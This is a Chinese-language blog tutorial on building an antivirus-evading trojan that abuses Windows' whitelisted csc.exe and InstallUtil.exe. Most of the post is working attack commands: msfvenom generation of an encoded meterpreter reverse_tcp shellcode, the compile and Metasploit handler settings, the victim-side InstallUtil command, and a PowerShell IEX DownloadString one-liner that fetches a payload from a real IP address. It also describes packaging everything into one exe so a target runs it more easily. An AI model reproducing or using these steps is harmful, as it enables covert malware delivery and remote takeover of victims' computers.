CSC 白名单制作（矛与盾的对抗）

CSC 白名单制作（矛与盾的对抗）

概述

https://github.com/klionsec/BypassAV-AllThings

https://klionsec.github.io/

https://micro8.github.io/Micro8-HTML/Chapter1/71-80/77_%E5%9F%BA%E4%BA%8E%E7%99%BD%E5%90%8D%E5%8D%95Csc.exe%E6%89%A7%E8%A1%8Cpayload%E7%AC%AC%E4%B8%83%E5%AD%A3.html

可以先参考下klion和micro8两位大佬的链接了解下原理。

小白在这次在csc白名单制作中加入了nps（无powershell）启动，然后使用C#将其整合一个exe中。（外加了一个端口转发可以对公网发起攻击）

Frp（公网映射）

可以参照小白的上一篇配置https://www.jianshu.com/p/2041b89ff572

Msfveom 生成shellcode

msfvenom --platform Windows -a x64 -p

windows/x64/meterpreter/reverse_tcp_uuid LHOST=公网ip

LPORT=映射端口-b '\x00' -e x64/xor -i 16 -f csharp -olly_360.txt

执行后会生产原始shellcode文件

InstallUtil-Shellcode.cs 替换shellcode

Klion已经将写好代码放在github上https://github.com/klionsec/BypassAV-AllThings

用msf生产的shellcode替换掉原始的shellcode

编译exe文件

Windows系统Cmd中执行以下命令：

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe      /unsafe /platform:x64 /out:lly_360.exeC:\Users\a1109\Desktop\InstallUtil-Shellcode.cs

然后生产一个exe文件

Msf监听木马上线

use exploit/multi/handler

set payloadwindows/x64/meterpreter/reverse_tcp_uuid

set lhost 127.0.0.1

set lport 4444

set exitonsession false

set EnableStageEncoding true

set Stageencoder x64/xor

set stageencodingfallback false

exploit -j -z

受害执行以下命令：

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe/logfile= /LogToConsole=false /U lly_360.exe

成功反弹shell

木马完善

小白复现大佬的免杀后，发现如果我是受害人。这样种马太难了，于是想办法将所有的工具和所需的命令集合到一起做成一个exe文件。

大致思路是这样的：

上面windows系统生产的lly_360.exe是真正的有毒文件。这样发给目标不是很容易就被静态查杀，还有得需要一条cmd命令才能运行，这样运行成本太高了。目标很难去执行你的木马，因为你不可能去发目标一个exe再加一串乱码码，然后告诉目标再在cmd里执行这串乱码哦！

我是这样想的（如果你有更好的想法可以分享给我）：

在VPS上搭建一个nginx服务器，将lly_360.exe放在nginx上，将执行木马的cmd命令写成.bat文件。然后使用powshell去下载执行。（nps是无powersehll命令执行，还提供了C#的源码更灵活哦！）链接地址：https://github.com/Ben0xA/nps

Docker搭建nginx环境

将exe，.bat文件上传nignx上。

不会的兄弟网上查下，资料很多。

nps 下载.bat并执行

nps.exe "IEX (New-ObjectNet.WebClient).DownloadString('http://39.98.171.162:8081/YLL/test.bat')"

cmd 执行以下命令就可让木马上线了，但是目标机得有exe文件啊！作者已经给出了源码我在源码上稍作修改，将其整合到一个exe里

C#编译修改源码

我的代码太乱了，就不往上放了，截图里都有。

然后启动编译就可以。

再次木马上线测试

运行XXXX.exe，自动下载lly_360.exe文件，然后powershell执行.bat文件。成功上线。

病毒与杀毒本身就是矛与盾的对抗，这样才可以太高杀毒的能力,让网络更加安全。并且提升个人安全意识才是最重要的，不要随意乱点陌生exe或未知链接哦!

                                                                                                                            2019-9-5

                                                                                                                                   YLL